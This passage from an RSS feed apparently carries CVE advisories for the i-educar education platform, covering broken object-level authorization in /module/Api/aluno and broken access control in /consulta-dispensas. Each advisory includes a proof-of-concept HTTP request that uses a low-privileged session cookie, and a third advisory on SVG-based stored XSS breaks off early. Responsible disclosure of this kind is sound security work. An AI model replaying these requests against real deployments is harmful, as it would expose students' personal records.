&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /module/Api/aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce &amp;lt;b&amp;gt;object-level authorization&amp;lt;/b&amp;gt;when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Expected behavior:&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Unauthorized users should receive 403 Forbidden or an empty response.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Observed behavior:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user (e.g., student, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11047/image.png&amp;#34;
	width=&amp;#34;1380&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11047/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-11047/image_hu_374181a535d27950.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11047/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;616&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11047/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-11047/image-1_hu_5d2f89eaf0785474.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;329px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/aluno?&amp;amp;amp;oper=get&amp;amp;amp;resource=matriculas&amp;amp;amp;aluno_id=206 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_aluno_det.php?cod_aluno=206
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[LOW PRIVILEGED COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11047/image-2.png&amp;#34;
	width=&amp;#34;1345&amp;#34;
	height=&amp;#34;676&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11047/image-2_hu_b56dab6489bf9ba8.png 480w, /p/cve-2025-11047/image-2_hu_146b18df03b3e320.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;198&amp;#34;
		data-flex-basis=&amp;#34;477px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that informations about classes were returned.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive PII;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Violation of data protection laws (e.g., LGPD, GDPR);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential abuse of user data or impersonation;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;User enumeration.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 26 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11048</title>
        <link>https://www.cvehunters.com/p/cve-2025-11048/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-11048/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11048-broken-access-control-in-consulta-dispensas-endpoint&amp;#34;&amp;gt;CVE-2025-11048: Broken Access Control in &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /consulta-dispensas&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11048-broken-access-control-in-consulta-dispensas-endpoint&amp;#34;&amp;gt;CVE-2025-11048: Broken Access Control in &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /consulta-dispensas&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11048/image.png&amp;#34;
	width=&amp;#34;1603&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11048/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11048/image_hu_7e1e16197ca84d77.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11048/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11048/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11048/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /consulta-dispensas HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11048/image-2.png&amp;#34;
	width=&amp;#34;960&amp;#34;
	height=&amp;#34;816&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11048/image-2_hu_c031b0a968dc8a1c.png 480w, /p/cve-2025-11048/image-2_hu_d30391eb81b5ae23.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;117&amp;#34;
		data-flex-basis=&amp;#34;282px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 26 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10909</title>
        <link>https://www.cvehunters.com/p/cve-2025-10909/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10909/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10909-multiples-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass&amp;#34;&amp;gt;CVE-2025-10909: Multiples Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
